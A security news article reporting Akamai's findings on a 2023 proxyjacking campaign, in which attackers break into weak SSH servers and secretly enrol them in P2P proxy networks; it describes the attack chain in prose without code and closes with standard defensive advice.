SSH Servers at Risk in Ongoing Proxyjacking Campaign Orchestrated by Cybercriminals
SSH Servers at Risk in Ongoing Proxyjacking Campaign Orchestrated by Cybercriminals

Image: Alexander Sinn (unsplash)

There is a currently ongoing and financially motivated campaign that targets weak SSH servers to surreptitiously incorporate them into a proxy network.

Akamai researcher, Allen West, noted in a report that the campaign involves an assailant exploiting SSH for remote accessibility. The attacker then executes malicious scripts that imperceptibly recruit victim servers into a Peer2Profit or Honeygain-like peer-to-peer (P2P) proxy network.

This form of attack, called proxyjacking, differs from cryptojacking, where a compromised system’s resources are used unlawfully to mine cryptocurrency. Proxyjacking provides an avenue for malicious entities to use the victim’s unused bandwidth to discreetly operate various services as a P2P node.

This method offers a dual advantage for the attackers. Firstly, it provides a means for the perpetrator to profit from the surplus bandwidth, decreasing the required resource load for executing cryptojacking. Secondly, it lowers the likelihood of being detected.

West indicated that proxyjacking is a more covert alternative to cryptojacking, resulting in severe consequences that could potentially amplify the problems already posed by proxied Layer 7 attacks.

However, the anonymity that proxyware services offer could also be exploited by malevolent actors. They can obscure the origin of their attacks by directing traffic via intermediary nodes, thus acting as a potential risk.

Akamai disclosed that the latest campaign, discovered on June 8, 2023, aims to infiltrate vulnerable SSH servers and deploy a concealed Bash script. This script can subsequently download necessary dependencies from a compromised web server, including the curl command-line tool, cleverly disguised as a CSS file (“csdark.css”).

The concealed script proactively identifies and terminates competing instances running bandwidth-sharing services, before initiating Docker services that exploit the victim’s bandwidth for gains.

Upon a more detailed analysis of the compromised web server, it was revealed that it also hosts a cryptocurrency miner. This indicates the possibility of the malicious actors engaging in both cryptojacking and proxyjacking attacks.

While not all proxyware activities are inherently malicious, Akamai pointed out that certain companies fail to authenticate the sources of the IPs in their networks, occasionally even suggesting that people install their software on their work computers.

Such activities cross over into cybercrime territory when applications are installed without the users’ consent, enabling the threat actor to gain control over multiple systems and generate unlawful revenue.

According to West, older techniques still prove to be effective, particularly when used in conjunction with new outcomes. He emphasized that standard security practices, including strong passwords, patch management, and thorough logging, continue to be an effective preventive measure.